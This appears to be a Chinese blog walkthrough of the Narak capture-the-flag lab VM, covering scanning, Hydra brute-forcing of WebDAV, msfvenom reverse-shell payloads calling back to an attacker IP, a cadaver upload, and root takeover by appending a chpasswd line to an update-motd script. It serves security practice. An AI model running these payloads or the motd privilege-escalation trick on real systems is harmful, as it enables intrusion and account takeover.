当前位置:网站首页>打靶narak
打靶narak
2022-04-23 02:28:00 【嗯光】
主机发现
nmap -sS 192.168.226.0/24
端口扫描

dirb基于字典的目录扫描工具
发现三个目录


访问该目录
网络存储文件共享之WebDAV

再用hydra爆破以下
或者burpsuite爆破
yamdoot, Swarg
.海德拉(Hydra)
Medusa(美杜莎)
patator
msf
都可以
用cewl工具通过爬取网站信息的关键字来生成字典,通过生成的字典进行爆破

用hydra爆破工具爆破
-L指定用户名 -P指定密码 ip地址加协议加路径。http就是网站的协议,get是采用的请求方法,后面加路径

再尝试登陆下:

无可用信息,查看下源代码:
cadaver工具连接
cadaver http://192.168.8.132/webdav
username:yamdoot
password:Swarg
1.百度发现webdav服务,需要cadaver工具连接,连接之后可以上传

上传shell
nmap -O 发现其实 linux 系统

msfvenom生成木马
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22456 -f elf -o /home/kali/Desktop/yui.elf

监听

上传

liunx失败换一个php的
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php

msf 监听
访问php文件

shell拿到

提权 权限维持
权限低

查看用户:

mnt 目录 hell.sh

https://www.splitbrain.org/services/ook

brainfuck to text解码,得到解密内容chitragupt 应该是密码
chitragupt
提权助手 提权 github 开源项目
https://github.com/mzet-/linux-exploit-suggester
linux中的.sh文件怎么执行?
1、直接./加上文件名.sh,如运行hello.sh为 ./hello.sh 【绝对路径下也可以,但hello.sh必须有x权限】
chmod u+x hello.sh



挨个试一试

上传解压

用ssh尝试登录其他用户,输入刚刚解密的密码,发现成功登录该用户


echo “echo ‘root:inferno’|sudo chpasswd” >> /etc/update-motd.d/00-header
退出后重新用inferno登录
su -root
成功获取root权限: 密码 inferno

版权声明
本文为[嗯光]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_42096378/article/details/124353688
边栏推荐
- Usage of vector common interface
- Day18 -- stack queue
- Latin goat (20204-2022) - daily question 1
- Real math problems in 1958 college entrance examination
- Open3d point cloud processing
- Unicorn bio raised $3.2 million to turn prototype equipment used to grow meat into commercial products
- On LAN
- PTA: 点赞狂魔
- [assembly language] understand "stack" from the lowest point of view
- Go language ⌈ mutex and state coordination ⌋
猜你喜欢

010_ StringRedisTemplate

SO库依赖问题

So library dependency

SQL server2019 cannot download the required files, which may indicate that the version of the installer is no longer supported. What should I do

How to prevent leakage of operation and maintenance data

89 logistic回归用户画像用户响应度预测

arduino esp8266 网络升级 OTA

011_ Redistemplate operation hash

Dynamic memory management

Day18 -- stack queue
随机推荐
MySQL C language connection
Go语言web中间件的使用
Is the sinking coffee industry a false prosperity or the eve of a broken situation?
Handwritten memory pool and principle code analysis [C language]
Global, exclusive, local Routing Guard
从0开始开发一个chrome插件(2)
New book recommendation - IPv6 technology and application (Ruijie version)
How to prevent leakage of operation and maintenance data
Lighting LED of IAR embedded development stm32f103c8t6
LeetCode 447. Number of boomerangs (permutation and combination problem)
007_Redis_Jedis连接池
005_ redis_ Set set
C语言中*与&的用法与区别 以及关键字static和volatile 的含义
The 16th day of sprint to the big factory, noip popularization Group Three Kingdoms game
智能辅助功能丰富,思皓X6安全配置曝光:将于4月23日预售
Kubernetes cluster installation based on Kirin SP10 server version
全局、獨享、局部路由守衛
OJ daily practice - Finish
使用Go语言构建Web服务器
tp6阿裏雲短信 window 報 cURL error 60: SSL certificate problem: unable to get local issuer certificate